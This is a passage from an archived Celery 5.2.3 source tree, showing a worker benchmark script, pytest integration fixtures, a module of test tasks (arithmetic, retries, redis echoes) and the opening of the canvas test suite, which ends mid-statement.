classifiers=[ "Development Status :: 5 - Production/Stable", "License :: OSI Approved :: BSD License", "Topic :: System :: Distributed Computing", "Topic :: Software Development :: Object Brokering", "Framework :: Celery", "Programming Language :: Python", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.7", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: Implementation :: CPython", "Programming Language :: Python :: Implementation :: PyPy", "Operating System :: OS Independent" ] ) ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7477558 celery-5.2.3/t/0000775000175000017500000000000000000000000013140 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/__init__.py0000664000175000017500000000000000000000000015237 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7477558 celery-5.2.3/t/benchmarks/0000775000175000017500000000000000000000000015255 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/benchmarks/bench_worker.py0000664000175000017500000000537700000000000020313 0ustar00asifasif00000000000000import os import sys import time from celery import Celery os.environ.update( NOSETPS='yes', USE_FAST_LOCALS='yes', ) DEFAULT_ITS = 40000 BROKER_TRANSPORT = os.environ.get('BROKER', 
'librabbitmq://') if hasattr(sys, 'pypy_version_info'): BROKER_TRANSPORT = 'pyamqp://' app = Celery('bench_worker') app.conf.update( broker_url=BROKER_TRANSPORT, broker_pool_limit=10, worker_pool='solo', worker_prefetch_multiplier=0, task_default_delivery_mode=1, task_queues={ 'bench.worker': { 'exchange': 'bench.worker', 'routing_key': 'bench.worker', 'no_ack': True, 'exchange_durable': False, 'queue_durable': False, 'auto_delete': True, } }, task_serializer='json', task_default_queue='bench.worker', result_backend=None, ), def tdiff(then): return time.monotonic() - then @app.task(cur=0, time_start=None, queue='bench.worker', bare=True) def it(_, n): # use internal counter, as ordering can be skewed # by previous runs, or the broker. i = it.cur if i and not i % 5000: print(f'({i} so far: {tdiff(it.subt)}s)', file=sys.stderr) it.subt = time.monotonic() if not i: it.subt = it.time_start = time.monotonic() elif i > n - 2: total = tdiff(it.time_start) print(f'({i} so far: {tdiff(it.subt)}s)', file=sys.stderr) print('-- process {} tasks: {}s total, {} tasks/s'.format( n, total, n / (total + .0), )) import os os._exit() it.cur += 1 def bench_apply(n=DEFAULT_ITS): time_start = time.monotonic() task = it._get_current_object() with app.producer_or_acquire() as producer: [task.apply_async((i, n), producer=producer) for i in range(n)] print(f'-- apply {n} tasks: {time.monotonic() - time_start}s') def bench_work(n=DEFAULT_ITS, loglevel='CRITICAL'): loglevel = os.environ.get('BENCH_LOGLEVEL') or loglevel if loglevel: app.log.setup_logging_subsystem(loglevel=loglevel) worker = app.WorkController(concurrency=15, queues=['bench.worker']) try: print('-- starting worker') worker.start() except SystemExit: raise assert sum(worker.state.total_count.values()) == n + 1 def bench_both(n=DEFAULT_ITS): bench_apply(n) bench_work(n) def main(argv=sys.argv): n = DEFAULT_ITS if len(argv) < 2: print(f'Usage: {os.path.basename(argv[0])} [apply|work|both] [n=20k]') return sys.exit(1) try: n = int(argv[2]) except IndexError: pass return {'apply': bench_apply, 'work': bench_work, 'both': bench_both}[argv[1]](n=n) if __name__ == '__main__': main() ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7597558 celery-5.2.3/t/integration/0000775000175000017500000000000000000000000015463 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/integration/__init__.py0000664000175000017500000000000000000000000017562 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/integration/conftest.py0000664000175000017500000000351700000000000017670 0ustar00asifasif00000000000000import os import pytest # we have to import the pytest plugin fixtures here, # in case user did not do the `python setup.py develop` yet, # that installs the pytest plugin into the setuptools registry. from celery.contrib.pytest import celery_app, celery_session_worker from celery.contrib.testing.manager import Manager TEST_BROKER = os.environ.get('TEST_BROKER', 'pyamqp://') TEST_BACKEND = os.environ.get('TEST_BACKEND', 'redis://') # Tricks flake8 into silencing redefining fixtures warnings. 
__all__ = ( 'celery_app', 'celery_session_worker', 'get_active_redis_channels', 'get_redis_connection', ) def get_redis_connection(): from redis import StrictRedis return StrictRedis(host=os.environ.get('REDIS_HOST')) def get_active_redis_channels(): return get_redis_connection().execute_command('PUBSUB CHANNELS') @pytest.fixture(scope='session') def celery_config(): return { 'broker_url': TEST_BROKER, 'result_backend': TEST_BACKEND, 'cassandra_servers': ['localhost'], 'cassandra_keyspace': 'tests', 'cassandra_table': 'tests', 'cassandra_read_consistency': 'ONE', 'cassandra_write_consistency': 'ONE' } @pytest.fixture(scope='session') def celery_enable_logging(): return True @pytest.fixture(scope='session') def celery_worker_pool(): return 'prefork' @pytest.fixture(scope='session') def celery_includes(): return {'t.integration.tasks'} @pytest.fixture def app(celery_app): yield celery_app @pytest.fixture def manager(app, celery_session_worker): return Manager(app) @pytest.fixture(autouse=True) def ZZZZ_set_app_current(app): app.set_current() app.set_default() @pytest.fixture(scope='session') def celery_class_tasks(): from t.integration.tasks import ClassBasedAutoRetryTask return [ClassBasedAutoRetryTask] ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/integration/tasks.py0000664000175000017500000002340600000000000017167 0ustar00asifasif00000000000000from time import sleep from celery import Signature, Task, chain, chord, group, shared_task from celery.exceptions import SoftTimeLimitExceeded from celery.utils.log import get_task_logger from .conftest import get_redis_connection logger = get_task_logger(__name__) @shared_task def identity(x): """Return the argument.""" return x @shared_task def add(x, y, z=None): """Add two or three numbers.""" if z: return x + y + z else: return x + y @shared_task def write_to_file_and_return_int(file_name, i): with open(file_name, mode='a', buffering=1) as file_handle: file_handle.write(str(i)+'\n') return i @shared_task(typing=False) def add_not_typed(x, y): """Add two numbers, but don't check arguments""" return x + y @shared_task(ignore_result=True) def add_ignore_result(x, y): """Add two numbers.""" return x + y @shared_task def raise_error(*args): """Deliberately raise an error.""" raise ValueError("deliberate error") @shared_task def chain_add(x, y): ( add.s(x, x) | add.s(y) ).apply_async() @shared_task def chord_add(x, y): chord(add.s(x, x), add.s(y)).apply_async() @shared_task def delayed_sum(numbers, pause_time=1): """Sum the iterable of numbers.""" # Allow the task to be in STARTED state for # a limited period of time. 
sleep(pause_time) return sum(numbers) @shared_task def delayed_sum_with_soft_guard(numbers, pause_time=1): """Sum the iterable of numbers.""" try: sleep(pause_time) return sum(numbers) except SoftTimeLimitExceeded: return 0 @shared_task def tsum(nums): """Sum an iterable of numbers.""" return sum(nums) @shared_task(bind=True) def add_replaced(self, x, y): """Add two numbers (via the add task).""" raise self.replace(add.s(x, y)) @shared_task(bind=True) def replace_with_chain(self, *args, link_msg=None): c = chain(identity.s(*args), identity.s()) link_sig = redis_echo.s() if link_msg is not None: link_sig.args = (link_msg,) link_sig.set(immutable=True) c.link(link_sig) return self.replace(c) @shared_task(bind=True) def replace_with_chain_which_raises(self, *args, link_msg=None): c = chain(identity.s(*args), raise_error.s()) link_sig = redis_echo.s() if link_msg is not None: link_sig.args = (link_msg,) link_sig.set(immutable=True) c.link_error(link_sig) return self.replace(c) @shared_task(bind=True) def replace_with_empty_chain(self, *_): return self.replace(chain()) @shared_task(bind=True) def add_to_all(self, nums, val): """Add the given value to all supplied numbers.""" subtasks = [add.s(num, val) for num in nums] raise self.replace(group(*subtasks)) @shared_task(bind=True) def add_to_all_to_chord(self, nums, val): for num in nums: self.add_to_chord(add.s(num, val)) return 0 @shared_task(bind=True) def add_chord_to_chord(self, nums, val): subtasks = [add.s(num, val) for num in nums] self.add_to_chord(group(subtasks) | tsum.s()) return 0 @shared_task def print_unicode(log_message='hå它 valmuefrø', print_message='hiöäüß'): """Task that both logs and print strings containing funny characters.""" logger.warning(log_message) print(print_message) @shared_task def return_exception(e): """Return a tuple containing the exception message and sentinel value.""" return e, True @shared_task def sleeping(i, **_): """Task sleeping for ``i`` seconds, and returning nothing.""" sleep(i) @shared_task(bind=True) def ids(self, i): """Returns a tuple of ``root_id``, ``parent_id`` and the argument passed as ``i``.""" return self.request.root_id, self.request.parent_id, i @shared_task(bind=True) def collect_ids(self, res, i): """Used as a callback in a chain or group where the previous tasks are :task:`ids`: returns a tuple of:: (previous_result, (root_id, parent_id, i)) """ return res, (self.request.root_id, self.request.parent_id, i) @shared_task(bind=True, default_retry_delay=1) def retry(self, return_value=None): """Task simulating multiple retries. When return_value is provided, the task after retries returns the result. Otherwise it fails. """ if return_value: attempt = getattr(self, 'attempt', 0) print('attempt', attempt) if attempt >= 3: delattr(self, 'attempt') return return_value self.attempt = attempt + 1 raise self.retry(exc=ExpectedException(), countdown=5) @shared_task(bind=True, expires=60.0, max_retries=1) def retry_once(self, *args, expires=60.0, max_retries=1, countdown=0.1): """Task that fails and is retried. Returns the number of retries.""" if self.request.retries: return self.request.retries raise self.retry(countdown=countdown, max_retries=max_retries) @shared_task(bind=True, expires=60.0, max_retries=1) def retry_once_priority(self, *args, expires=60.0, max_retries=1, countdown=0.1): """Task that fails and is retried. 
Returns the priority.""" if self.request.retries: return self.request.delivery_info['priority'] raise self.retry(countdown=countdown, max_retries=max_retries) @shared_task def redis_echo(message, redis_key="redis-echo"): """Task that appends the message to a redis list.""" redis_connection = get_redis_connection() redis_connection.rpush(redis_key, message) @shared_task def redis_count(redis_key="redis-count"): """Task that increments a specified or well-known redis key.""" redis_connection = get_redis_connection() redis_connection.incr(redis_key) @shared_task(bind=True) def second_order_replace1(self, state=False): redis_connection = get_redis_connection() if not state: redis_connection.rpush('redis-echo', 'In A') new_task = chain(second_order_replace2.s(), second_order_replace1.si(state=True)) raise self.replace(new_task) else: redis_connection.rpush('redis-echo', 'Out A') @shared_task(bind=True) def second_order_replace2(self, state=False): redis_connection = get_redis_connection() if not state: redis_connection.rpush('redis-echo', 'In B') new_task = chain(redis_echo.s("In/Out C"), second_order_replace2.si(state=True)) raise self.replace(new_task) else: redis_connection.rpush('redis-echo', 'Out B') @shared_task(bind=True) def build_chain_inside_task(self): """Task to build a chain. This task builds a chain and returns the chain's AsyncResult to verify that Asyncresults are correctly converted into serializable objects""" test_chain = ( add.s(1, 1) | add.s(2) | group( add.s(3), add.s(4) ) | add.s(5) ) result = test_chain() return result class ExpectedException(Exception): """Sentinel exception for tests.""" def __eq__(self, other): return ( other is not None and isinstance(other, ExpectedException) and self.args == other.args ) def __hash__(self): return hash(self.args) @shared_task def fail(*args): """Task that simply raises ExpectedException.""" args = ("Task expected to fail",) + args raise ExpectedException(*args) @shared_task(bind=True) def fail_replaced(self, *args): """Replace this task with one which raises ExpectedException.""" raise self.replace(fail.si(*args)) @shared_task(bind=True) def return_priority(self, *_args): return "Priority: %s" % self.request.delivery_info['priority'] @shared_task(bind=True) def return_properties(self): return self.request.properties class ClassBasedAutoRetryTask(Task): name = 'auto_retry_class_task' autoretry_for = (ValueError,) retry_kwargs = {'max_retries': 1} retry_backoff = True def run(self): if self.request.retries: return self.request.retries raise ValueError() # The signatures returned by these tasks wouldn't actually run because the # arguments wouldn't be fulfilled - we never actually delay them so it's fine @shared_task def return_nested_signature_chain_chain(): return chain(chain([add.s()])) @shared_task def return_nested_signature_chain_group(): return chain(group([add.s()])) @shared_task def return_nested_signature_chain_chord(): return chain(chord([add.s()], add.s())) @shared_task def return_nested_signature_group_chain(): return group(chain([add.s()])) @shared_task def return_nested_signature_group_group(): return group(group([add.s()])) @shared_task def return_nested_signature_group_chord(): return group(chord([add.s()], add.s())) @shared_task def return_nested_signature_chord_chain(): return chord(chain([add.s()]), add.s()) @shared_task def return_nested_signature_chord_group(): return chord(group([add.s()]), add.s()) @shared_task def return_nested_signature_chord_chord(): return chord(chord([add.s()], add.s()), add.s()) 
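# A minimal sketch (illustrative only, not used by the tests) of the round
# trip that ``rebuild_signature`` below relies on: signatures serialize to
# plain dicts, and ``Signature.from_dict`` restores them, nested canvases
# included. All names used here are already imported at the top of this file.
def _signature_roundtrip_sketch():
    # Build a nested canvas, flatten it to the dict form that crosses the
    # wire, then rebuild it from that dict.
    sig = chain(add.s(1, 2), group(add.s(3), add.s(4)))
    sig_dict = dict(sig)
    return Signature.from_dict(sig_dict)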
@shared_task
def rebuild_signature(sig_dict):
    sig_obj = Signature.from_dict(sig_dict)

    def _recurse(sig):
        if not isinstance(sig, Signature):
            raise TypeError(f"{sig!r} is not a signature object")
        # Most canvas types have a `tasks` attribute
        if isinstance(sig, (chain, group, chord)):
            for task in sig.tasks:
                _recurse(task)
        # `chord`s also have a `body` attribute
        if isinstance(sig, chord):
            _recurse(sig.body)
    _recurse(sig_obj)


@shared_task
def errback_old_style(request_id):
    redis_count(request_id)
    return request_id


@shared_task
def errback_new_style(request, exc, tb):
    redis_count(request.id)
    return request.id
././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0
celery-5.2.3/t/integration/test_backend.py0000664000175000017500000000214000000000000020460 0ustar00asifasif00000000000000
import os

import pytest

from celery import states
from celery.backends.azureblockblob import AzureBlockBlobBackend

pytest.importorskip('azure')


@pytest.mark.skipif(
    not os.environ.get('AZUREBLOCKBLOB_URL'),
    reason='Environment variable AZUREBLOCKBLOB_URL required'
)
class test_AzureBlockBlobBackend:
    def test_crud(self, manager):
        backend = AzureBlockBlobBackend(
            app=manager.app,
            url=os.environ["AZUREBLOCKBLOB_URL"])

        key_values = {("akey%d" % i).encode(): "avalue%d" % i
                      for i in range(5)}

        for key, value in key_values.items():
            backend._set_with_state(key, value, states.SUCCESS)

        actual_values = backend.mget(key_values.keys())
        expected_values = list(key_values.values())

        assert expected_values == actual_values

        for key in key_values:
            backend.delete(key)

    def test_get_missing(self, manager):
        backend = AzureBlockBlobBackend(
            app=manager.app,
            url=os.environ["AZUREBLOCKBLOB_URL"])

        assert backend.get(b"doesNotExist") is None
././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0
celery-5.2.3/t/integration/test_canvas.py0000664000175000017500000026536600000000000020361 0ustar00asifasif00000000000000
import collections
import re
import tempfile
import uuid
from datetime import datetime, timedelta
from time import monotonic, sleep

import pytest
import pytest_subtests  # noqa: F401

from celery import chain, chord, group, signature
from celery.backends.base import BaseKeyValueStoreBackend
from celery.exceptions import ImproperlyConfigured, TimeoutError
from celery.result import AsyncResult, GroupResult, ResultSet

from . import tasks
from .conftest import (TEST_BACKEND, get_active_redis_channels,
                       get_redis_connection)
from .tasks import (ExpectedException, add, add_chord_to_chord, add_replaced,
                    add_to_all, add_to_all_to_chord, build_chain_inside_task,
                    collect_ids, delayed_sum, delayed_sum_with_soft_guard,
                    errback_new_style, errback_old_style, fail, fail_replaced,
                    identity, ids, print_unicode, raise_error, redis_count,
                    redis_echo, replace_with_chain,
                    replace_with_chain_which_raises, replace_with_empty_chain,
                    retry_once, return_exception, return_priority,
                    second_order_replace1, tsum,
                    write_to_file_and_return_int)

RETRYABLE_EXCEPTIONS = (OSError, ConnectionError, TimeoutError)


def is_retryable_exception(exc):
    return isinstance(exc, RETRYABLE_EXCEPTIONS)


TIMEOUT = 60

_flaky = pytest.mark.flaky(reruns=5, reruns_delay=1,
                           cause=is_retryable_exception)
_timeout = pytest.mark.timeout(timeout=300)


def flaky(fn):
    return _timeout(_flaky(fn))


def await_redis_echo(expected_msgs, redis_key="redis-echo", timeout=TIMEOUT):
    """
    Helper to wait for a specified or well-known redis key to contain a string.
""" redis_connection = get_redis_connection() if isinstance(expected_msgs, (str, bytes, bytearray)): expected_msgs = (expected_msgs, ) expected_msgs = collections.Counter( e if not isinstance(e, str) else e.encode("utf-8") for e in expected_msgs ) # This can technically wait for `len(expected_msg_or_msgs) * timeout` :/ while +expected_msgs: maybe_key_msg = redis_connection.blpop(redis_key, timeout) if maybe_key_msg is None: raise TimeoutError( "Fetching from {!r} timed out - still awaiting {!r}" .format(redis_key, dict(+expected_msgs)) ) retrieved_key, msg = maybe_key_msg assert retrieved_key.decode("utf-8") == redis_key expected_msgs[msg] -= 1 # silently accepts unexpected messages # There should be no more elements - block momentarily assert redis_connection.blpop(redis_key, min(1, timeout)) is None def await_redis_count(expected_count, redis_key="redis-count", timeout=TIMEOUT): """ Helper to wait for a specified or well-known redis key to count to a value. """ redis_connection = get_redis_connection() check_interval = 0.1 check_max = int(timeout / check_interval) for i in range(check_max + 1): maybe_count = redis_connection.get(redis_key) # It's either `None` or a base-10 integer if maybe_count is not None: count = int(maybe_count) if count == expected_count: break elif i >= check_max: assert count == expected_count # try again later sleep(check_interval) else: raise TimeoutError(f"{redis_key!r} was never incremented") # There should be no more increments - block momentarily sleep(min(1, timeout)) assert int(redis_connection.get(redis_key)) == expected_count class test_link_error: @flaky def test_link_error_eager(self): exception = ExpectedException("Task expected to fail", "test") result = fail.apply(args=("test",), link_error=return_exception.s()) actual = result.get(timeout=TIMEOUT, propagate=False) assert actual == exception @flaky def test_link_error(self): exception = ExpectedException("Task expected to fail", "test") result = fail.apply(args=("test",), link_error=return_exception.s()) actual = result.get(timeout=TIMEOUT, propagate=False) assert actual == exception @flaky def test_link_error_callback_error_callback_retries_eager(self): exception = ExpectedException("Task expected to fail", "test") result = fail.apply( args=("test",), link_error=retry_once.s(countdown=None) ) assert result.get(timeout=TIMEOUT, propagate=False) == exception @flaky def test_link_error_callback_retries(self): exception = ExpectedException("Task expected to fail", "test") result = fail.apply_async( args=("test",), link_error=retry_once.s(countdown=None) ) assert result.get(timeout=TIMEOUT, propagate=False) == exception @flaky def test_link_error_using_signature_eager(self): fail = signature('t.integration.tasks.fail', args=("test",)) retrun_exception = signature('t.integration.tasks.return_exception') fail.link_error(retrun_exception) exception = ExpectedException("Task expected to fail", "test") assert (fail.apply().get(timeout=TIMEOUT, propagate=False), True) == ( exception, True) @flaky def test_link_error_using_signature(self): fail = signature('t.integration.tasks.fail', args=("test",)) retrun_exception = signature('t.integration.tasks.return_exception') fail.link_error(retrun_exception) exception = ExpectedException("Task expected to fail", "test") assert (fail.delay().get(timeout=TIMEOUT, propagate=False), True) == ( exception, True) class test_chain: @flaky def test_simple_chain(self, manager): c = add.s(4, 4) | add.s(8) | add.s(16) assert c().get(timeout=TIMEOUT) == 32 @flaky def 
test_single_chain(self, manager): c = chain(add.s(3, 4))() assert c.get(timeout=TIMEOUT) == 7 @flaky def test_complex_chain(self, manager): c = ( add.s(2, 2) | ( add.s(4) | add_replaced.s(8) | add.s(16) | add.s(32) ) | group(add.s(i) for i in range(4)) ) res = c() assert res.get(timeout=TIMEOUT) == [64, 65, 66, 67] @flaky def test_group_results_in_chain(self, manager): # This adds in an explicit test for the special case added in commit # 1e3fcaa969de6ad32b52a3ed8e74281e5e5360e6 c = ( group( add.s(1, 2) | group( add.s(1), add.s(2) ) ) ) res = c() assert res.get(timeout=TIMEOUT) == [4, 5] def test_chain_of_chain_with_a_single_task(self, manager): sig = signature('any_taskname', queue='any_q') chain([chain(sig)]).apply_async() def test_chain_on_error(self, manager): from .tasks import ExpectedException if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') # Run the chord and wait for the error callback to finish. c1 = chain( add.s(1, 2), fail.s(), add.s(3, 4), ) res = c1() with pytest.raises(ExpectedException): res.get(propagate=True) with pytest.raises(ExpectedException): res.parent.get(propagate=True) @flaky def test_chain_inside_group_receives_arguments(self, manager): c = ( add.s(5, 6) | group((add.s(1) | add.s(2), add.s(3))) ) res = c() assert res.get(timeout=TIMEOUT) == [14, 14] @flaky def test_eager_chain_inside_task(self, manager): from .tasks import chain_add prev = chain_add.app.conf.task_always_eager chain_add.app.conf.task_always_eager = True chain_add.apply_async(args=(4, 8), throw=True).get() chain_add.app.conf.task_always_eager = prev @flaky def test_group_chord_group_chain(self, manager): if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') redis_connection = get_redis_connection() redis_connection.delete('redis-echo') before = group(redis_echo.si(f'before {i}') for i in range(3)) connect = redis_echo.si('connect') after = group(redis_echo.si(f'after {i}') for i in range(2)) result = (before | connect | after).delay() result.get(timeout=TIMEOUT) redis_messages = list(redis_connection.lrange('redis-echo', 0, -1)) before_items = {b'before 0', b'before 1', b'before 2'} after_items = {b'after 0', b'after 1'} assert set(redis_messages[:3]) == before_items assert redis_messages[3] == b'connect' assert set(redis_messages[4:]) == after_items redis_connection.delete('redis-echo') @flaky def test_group_result_not_has_cache(self, manager): t1 = identity.si(1) t2 = identity.si(2) gt = group([identity.si(3), identity.si(4)]) ct = chain(identity.si(5), gt) task = group(t1, t2, ct) result = task.delay() assert result.get(timeout=TIMEOUT) == [1, 2, [3, 4]] @flaky def test_second_order_replace(self, manager): if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') redis_connection = get_redis_connection() redis_connection.delete('redis-echo') result = second_order_replace1.delay() result.get(timeout=TIMEOUT) redis_messages = list(redis_connection.lrange('redis-echo', 0, -1)) expected_messages = [b'In A', b'In B', b'In/Out C', b'Out B', b'Out A'] assert redis_messages == expected_messages @flaky def test_parent_ids(self, manager, num=10): assert_ping(manager) c = chain(ids.si(i=i) for i in range(num)) c.freeze() res = c() try: res.get(timeout=TIMEOUT) except TimeoutError: print(manager.inspect().active()) print(manager.inspect().reserved()) print(manager.inspect().stats()) raise self.assert_ids(res, num - 1) def 
assert_ids(self, res, size): i, root = size, res while root.parent: root = root.parent node = res while node: root_id, parent_id, value = node.get(timeout=30) assert value == i if node.parent: assert parent_id == node.parent.id assert root_id == root.id node = node.parent i -= 1 def test_chord_soft_timeout_recuperation(self, manager): """Test that if soft timeout happens in task but is managed by task, chord still get results normally """ if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') c = chord([ # return 3 add.s(1, 2), # return 0 after managing soft timeout delayed_sum_with_soft_guard.s( [100], pause_time=2 ).set( soft_time_limit=1 ), ]) result = c(delayed_sum.s(pause_time=0)).get() assert result == 3 def test_chain_error_handler_with_eta(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) eta = datetime.utcnow() + timedelta(seconds=10) c = chain( group( add.s(1, 2), add.s(3, 4), ), tsum.s() ).on_error(print_unicode.s()).apply_async(eta=eta) result = c.get() assert result == 10 @flaky def test_groupresult_serialization(self, manager): """Test GroupResult is correctly serialized to save in the result backend""" try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) async_result = build_chain_inside_task.delay() result = async_result.get() assert len(result) == 2 assert isinstance(result[0][1], list) @flaky def test_chain_of_task_a_group_and_a_chord(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c = add.si(1, 0) c = c | group(add.s(1), add.s(1)) c = c | group(tsum.s(), tsum.s()) c = c | tsum.s() res = c() assert res.get(timeout=TIMEOUT) == 8 @flaky def test_chain_of_chords_as_groups_chained_to_a_task_with_two_tasks(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c = add.si(1, 0) c = c | group(add.s(1), add.s(1)) c = c | tsum.s() c = c | add.s(1) c = c | group(add.s(1), add.s(1)) c = c | tsum.s() res = c() assert res.get(timeout=TIMEOUT) == 12 @flaky def test_chain_of_chords_with_two_tasks(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c = add.si(1, 0) c = c | group(add.s(1), add.s(1)) c = c | tsum.s() c = c | add.s(1) c = c | chord(group(add.s(1), add.s(1)), tsum.s()) res = c() assert res.get(timeout=TIMEOUT) == 12 @flaky def test_chain_of_a_chord_and_a_group_with_two_tasks(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c = add.si(1, 0) c = c | group(add.s(1), add.s(1)) c = c | tsum.s() c = c | add.s(1) c = c | group(add.s(1), add.s(1)) res = c() assert res.get(timeout=TIMEOUT) == [6, 6] @flaky def test_chain_of_a_chord_and_a_task_and_a_group(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c = group(add.s(1, 1), add.s(1, 1)) c = c | tsum.s() c = c | add.s(1) c = c | group(add.s(1), add.s(1)) res = c() assert res.get(timeout=TIMEOUT) == [6, 6] @flaky def test_chain_of_a_chord_and_two_tasks_and_a_group(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c = group(add.s(1, 1), add.s(1, 1)) c = c | tsum.s() c = c | add.s(1) c = c | 
add.s(1) c = c | group(add.s(1), add.s(1)) res = c() assert res.get(timeout=TIMEOUT) == [7, 7] @flaky def test_chain_of_a_chord_and_three_tasks_and_a_group(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c = group(add.s(1, 1), add.s(1, 1)) c = c | tsum.s() c = c | add.s(1) c = c | add.s(1) c = c | add.s(1) c = c | group(add.s(1), add.s(1)) res = c() assert res.get(timeout=TIMEOUT) == [8, 8] @flaky def test_nested_chain_group_lone(self, manager): """ Test that a lone group in a chain completes. """ sig = chain( group(identity.s(42), identity.s(42)), # [42, 42] ) res = sig.delay() assert res.get(timeout=TIMEOUT) == [42, 42] def test_nested_chain_group_mid(self, manager): """ Test that a mid-point group in a chain completes. """ try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) sig = chain( identity.s(42), # 42 group(identity.s(), identity.s()), # [42, 42] identity.s(), # [42, 42] ) res = sig.delay() assert res.get(timeout=TIMEOUT) == [42, 42] def test_nested_chain_group_last(self, manager): """ Test that a final group in a chain with preceding tasks completes. """ sig = chain( identity.s(42), # 42 group(identity.s(), identity.s()), # [42, 42] ) res = sig.delay() assert res.get(timeout=TIMEOUT) == [42, 42] def test_chain_replaced_with_a_chain_and_a_callback(self, manager): if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') redis_connection = get_redis_connection() redis_connection.delete('redis-echo') link_msg = 'Internal chain callback' c = chain( identity.s('Hello '), # The replacement chain will pass its args though replace_with_chain.s(link_msg=link_msg), add.s('world'), ) res = c.delay() assert res.get(timeout=TIMEOUT) == 'Hello world' await_redis_echo({link_msg, }) def test_chain_replaced_with_a_chain_and_an_error_callback(self, manager): if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') redis_connection = get_redis_connection() redis_connection.delete('redis-echo') link_msg = 'Internal chain errback' c = chain( identity.s('Hello '), replace_with_chain_which_raises.s(link_msg=link_msg), add.s(' will never be seen :(') ) res = c.delay() with pytest.raises(ValueError): res.get(timeout=TIMEOUT) await_redis_echo({link_msg, }) def test_chain_with_cb_replaced_with_chain_with_cb(self, manager): if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') redis_connection = get_redis_connection() redis_connection.delete('redis-echo') link_msg = 'Internal chain callback' c = chain( identity.s('Hello '), # The replacement chain will pass its args though replace_with_chain.s(link_msg=link_msg), add.s('world'), ) c.link(redis_echo.s()) res = c.delay() assert res.get(timeout=TIMEOUT) == 'Hello world' await_redis_echo({link_msg, 'Hello world'}) def test_chain_with_eb_replaced_with_chain_with_eb( self, manager, subtests ): if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') redis_connection = get_redis_connection() redis_connection.delete('redis-echo') inner_link_msg = 'Internal chain errback' outer_link_msg = 'External chain errback' c = chain( identity.s('Hello '), # The replacement chain will die and break the encapsulating chain replace_with_chain_which_raises.s(link_msg=inner_link_msg), add.s('world'), ) 
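        # The errback linked below is attached to the *outer* chain; the
        # replacement chain created by ``replace_with_chain_which_raises``
        # links its own errback (``redis_echo`` with ``inner_link_msg``), so
        # both messages are expected in redis once the replacement raises.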
c.link_error(redis_echo.si(outer_link_msg)) res = c.delay() with subtests.test(msg="Chain fails due to a child task dying"): with pytest.raises(ValueError): res.get(timeout=TIMEOUT) with subtests.test(msg="Chain and child task callbacks are called"): await_redis_echo({inner_link_msg, outer_link_msg}) def test_replace_chain_with_empty_chain(self, manager): r = chain(identity.s(1), replace_with_empty_chain.s()).delay() with pytest.raises(ImproperlyConfigured, match="Cannot replace with an empty chain"): r.get(timeout=TIMEOUT) def test_chain_children_with_callbacks(self, manager, subtests): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() redis_key = str(uuid.uuid4()) callback = redis_count.si(redis_key=redis_key) child_task_count = 42 child_sig = identity.si(1337) child_sig.link(callback) chain_sig = chain(child_sig for _ in range(child_task_count)) redis_connection.delete(redis_key) with subtests.test(msg="Chain executes as expected"): res_obj = chain_sig() assert res_obj.get(timeout=TIMEOUT) == 1337 with subtests.test(msg="Chain child task callbacks are called"): await_redis_count(child_task_count, redis_key=redis_key) redis_connection.delete(redis_key) def test_chain_children_with_errbacks(self, manager, subtests): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() redis_key = str(uuid.uuid4()) errback = redis_count.si(redis_key=redis_key) child_task_count = 42 child_sig = fail.si() child_sig.link_error(errback) chain_sig = chain(child_sig for _ in range(child_task_count)) redis_connection.delete(redis_key) with subtests.test(msg="Chain fails due to a child task dying"): res_obj = chain_sig() with pytest.raises(ExpectedException): res_obj.get(timeout=TIMEOUT) with 